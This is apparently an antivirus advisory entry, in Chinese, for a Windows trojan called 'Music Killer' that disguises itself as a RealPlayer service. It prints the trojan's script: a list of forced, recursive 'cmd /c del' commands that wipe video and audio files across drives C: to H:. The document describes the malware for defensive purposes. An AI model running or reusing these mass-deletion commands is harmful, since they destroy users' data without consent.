病毒别名: 处理时间:2007-03-15 威胁级别:★
中文名称:Music杀手 病毒类型:木马 影响系统:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒行为:
这是一个木马程序,该病毒运行时会弹出一个“-Swlog------”的窗口,然后删除感染机器上的avi,mp3,wmv,rm,文件,危害极大。
1.伪装为Real Player Sevres。
2.运行以下的脚本删除文件:
cmd /c del /f /s /q C:*.avi
cmd /c del /f /s /q d:*.avi
cmd /c del /f /s /q f:*.avi
cmd /c del /f /s /q g:*.avi
cmd /c del /f /s /q h:*.avi
cmd /c del /f /s /q c:*.MP3
cmd /c del /f /s /q d:*.MP3
cmd /c del /f /s /q e:*.MP3
cmd /c del /f /s /q f:*.MP3
cmd /c del /f /s /q g:*.MP3
cmd /c del /f /s /q h:*.MP3
cmd /c del /f /s /q c:*.wmv
cmd /c del /f /s /q d:*.wmv
cmd /c del /f /s /q e:*.wmv
cmd /c del /f /s /q f:*.wmv
cmd /c del /f /s /q g:*.wmv
cmd /c del /f /s /q h:*.wmv
cmd /c del /f /s /q c:*.rmvb
cmd /c del /f /s /q d:*.rmvb
cmd /c del /f /s /q e:*.rmvb
cmd /c del /f /s /q f:*.rmvb
cmd /c del /f /s /q g:*.rmvb
cmd /c del /f /s /q h:*.rmvb
cmd /c del /f /s /q c:*.rm
cmd /c del /f /s /q d:*.rm
cmd /c del /f /s /q e:*.rm
cmd /c del /f /s /q f:*.rm
cmd /c del /f /s /q g:*.rm